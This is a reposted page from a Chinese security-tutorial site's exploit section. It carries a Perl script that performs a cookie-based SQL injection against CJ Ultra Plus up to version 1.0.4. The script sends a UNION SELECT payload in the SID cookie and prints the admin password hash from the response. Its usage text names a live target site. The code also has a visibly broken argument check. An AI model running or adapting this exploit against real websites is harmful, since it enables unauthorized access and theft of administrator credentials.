• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > CJ Ultra Plus

CJ Ultra Plus

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了CJ Ultra Plus ,其中包含plus ultra,zeiss ultra plus,plus ultra什么意思,闪迪ultra plus,ultra plus xc3等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
#
# CJ Ultra Plus <= v1.0.4 Cookie SQL Injection
#
# found and coded by -SmoG- /\GermAn hAckZ0r
# contact: ICQ - 266836394
#
#
#
#
# hints: - sometimes the parameter "SID" is different to the normal one...
# - i extract the hash from the html-code... but i was 2 lazy for coding a good working filter
# - salted DES (normaly "aa" will be the salt, but it can be different)
# - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...
#
#
# >>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<<

use LWP::UserAgent;

if ($#ARGV 1 !=1) {
print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
print "found and coded by -SmoG-\n";
print "\n\nUsage: perl xploit.pl -victim\n";
print " perl xploit.pl http://gayxboy.com/\n\n"; #LiVe-Dem0! letZz pwnz the pedophile!!
exit();
}
print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
print "\nstarting exploit...";
$target=$ARGV[0];
chomp($target);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
$response = $ua->get($target, @header);
if ($response->is_success)
{
$temp = $response->content;
if ($temp =~/(.*)SID=(.*);/)
{
$result=substr($temp,85,13);
print "\n\adminhash: "; print $result;
}
}
else
{
die "Error: ".$response->status_line;
}


</div>

您可能想查找下面的文章:

  • CJ Ultra Plus

相关文章

  • File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
  • Linux Kernel
  • Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit
  • iGaming CMS
  • phsBlog 0.2 Bypass SQL Injection Filtering Exploit
  • Maian Recipe
  • MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
  • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
  • IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • IceBB
    • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
    • Maian Search
    • AuraCMS
    • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
    • WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
    • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
    • Ultra Office ActiveX Control Remote Buffer Overflow Exploit
    • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
    • Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有